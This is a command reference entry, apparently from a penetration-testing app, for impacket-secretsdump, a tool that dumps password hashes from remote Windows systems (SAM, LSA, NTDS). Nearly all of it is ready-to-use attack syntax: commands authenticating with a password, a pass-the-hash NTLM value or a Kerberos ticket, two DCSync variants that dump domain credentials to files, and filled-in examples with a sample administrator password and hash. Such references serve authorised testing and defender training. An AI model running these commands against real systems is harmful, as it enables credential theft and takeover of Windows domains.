Impacket Secrets Dump

Dump hashes from remote Windows system (SAM, LSA, NTDS)

Tool
impacket-secretsdump
Category
Credential Attacks / Hash Dumping
Platform
linux
Requires
password
Protocols
SMB

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

impacket-secretsdump '<domain>/<user>:<password>'@<ip>

Credential variants

The same attack using a different authentication material.

NTLM Hash requires NTLM hash

impacket-secretsdump -hashes ':<hash>' '<domain>/<user>'@<ip>

Kerberos Ticket requires Kerberos ticket

impacket-secretsdump -k -no-pass '<domain>/<user>'@<ip>

DCSync (just NTLM) requires Kerberos ticket

impacket-secretsdump -k -no-pass '<domain>/<user>'@<ip> -just-dc-ntlm -outputfile dcsync

DCSync (full) requires Kerberos ticket

impacket-secretsdump -k -no-pass '<domain>/<user>'@<ip> -just-dc -outputfile dcsync -pwd-last-set -user-status

Examples

impacket-secretsdump 'CORP/administrator:password123'@192.168.1.100
impacket-secretsdump -hashes ':e19ccf75ee54e06b06a5907af13cef42' 'CORP/administrator'@192.168.1.100

Tags

impacket secretsdump hashes sam ntds dcsync

References